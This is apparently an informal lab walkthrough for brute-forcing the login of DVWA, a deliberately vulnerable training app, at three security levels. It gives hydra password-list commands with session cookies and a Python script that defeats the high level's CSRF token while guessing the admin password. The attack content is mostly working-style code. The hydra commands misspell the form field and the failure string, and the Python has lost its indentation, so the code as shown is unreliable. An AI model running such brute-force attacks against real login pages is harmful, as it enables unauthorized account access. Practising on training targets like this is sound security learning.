clue find a password to login level low :
* see a cookie in incorrect login admin
"PHPSESSID : xxxxxxxxxxxxxxxxxxxxxxxxxxx"
"change one security : low & medium"
"message error : ......................?"
i use a tool hydra for attack a target to find password and username. cheatsheet hydra tool to attack target in terminal :
```
hydra -L /home/users/user.txt -P /home/users/passwd.txt 'http-get-form://ip target/DVWA/vulnerabilities/brute/:username=^USER^&passsword=^PASS^&Login=Login:H=Cookie\:PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxx; security=low:F=Username and /or password incorrenct'
```
clue find a password to login level medium :
*same level low in hydra tool bruteforce have change litte :
```
hydra -L /home/users/user.txt -P /home/users/passwd.txt 'http-get-form://ip target/DVWA/vulnerabilities/brute/:username=^USER^&passsword=^PASS^&Login=Login:H=Cookie\:PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxx; security=medium:F=Username and /or password incorrenct'
```
clue find a password to login level high :
use case level low and medium not find password. i use a python script to find password level high, this a script python for bruteforce :
```
from sys import argv
import requests
from bs4 import BeautifulSoup as Soup
# give our arguments more semantic friendly names
script, filename, success_message = argv
txt = open(filename)
# set up our target, cookie and session
url = 'http://ip_kita/DVWA/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID':'7bpok4vi2ekeskfdcnqho0q1mt'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)
'''
checkSuccess
@param: html (String)
Searches the response HTML for our specified success message
'''
def checkSuccess(html):
# get our soup ready for searching
soup = Soup(html)
# check for our success message in the soup
search = soup.findAll(text=success_message)
if not search:
success = False
else:
success = True
# return the brute force result
return success
# Get the intial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source);
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
# Display before attack
print 'DVWA URL' + url
print 'CSRF Token='+ csrf_token
# Loop through our provided password file
with open(filename) as f:
print 'Running brute force attack...'
for password in f:
# Displays password tries and strips whitespace from password list
print 'password tryed: ' + password
password = password.strip()
# setup the payload
payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
r = s.get(url, cookies=cookie, params=payload)
success = checkSuccess(r.text)
if not success:
# if it failed the CSRF token will be changed. Get the new one
soup = Soup(r.text)
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
else:
# Success! Show the result
print 'Password is: ' + password
break
# We failed, bummer.
if not success:
print 'Brute force failed. No matches found.'
```
thanks for read.
Sign in with Wallet
Connect another wallet